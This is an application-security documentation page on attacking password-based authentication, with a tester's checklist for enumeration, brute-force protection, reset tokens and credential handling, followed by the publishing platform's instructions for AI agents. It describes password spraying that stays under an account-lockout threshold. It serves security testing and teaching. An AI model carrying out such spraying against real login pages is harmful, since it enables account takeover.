> For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-password-based-authentication.md). # Attacking password-based authentication ## What is it? Password-based authentication generally allows to register an account and set a password, or sometimes an account will be assigned to them by an administrator. Password-based authentication tends to be suseptible to brute-force attacks, account lockouts and credential stuffing attacks. **A simple example** * A vulnerable web application allows users to sign up and set a password. * After 10 failed login attempts, an account is locked. * If an attacker uses 9 common passwords against many user accounts, they will gain access to ones that chose weak or common passwords. Broken authentication can often lead to: * Account takeover * Sensitive data exposure **Other learning resources:** * PortSwigger: **Writeups:** *Have a good writeup & want to share it here? Drop me a message on LinkedIn.* ## Checklist * [ ] Can we enumerate user accounts? * [ ] Registration page * [ ] Login page * [ ] Password reset page * [ ] Is there any brute-force protection? * [ ] Check for account lockouts * [ ] Check for rate limiting * [ ] Check for CAPTCHA * [ ] Check for MFA * [ ] What is the password policy? * [ ] Check the strength requirements * [ ] Is the password stored securely? (E.g. if we reset, will it send us the cleartext password) * [ ] Is the password reset token sufficiently unique? * [ ] Are credentials predictable? * [ ] Check for default credentials * [ ] Check for username conventions (E.g. firstname.lastname) * [ ] Is autocomplete enabled on password fields? * [ ] Check the password reset functionality * [ ] Knowledge-based questions * [ ] Token leakage via Referrer * [ ] Token predictability * [ ] Is authentication happening client-side? * [ ] Are there any backups or leaked files with creds? * [ ] Is there remember me or auto login functionality? * [ ] Are the tokens for this predictable? * [ ] How long does the token remain valid? * [ ] Are tokens or credentials passed via the URL? * [ ] Are there CSRF tokens? --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-password-based-authentication.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.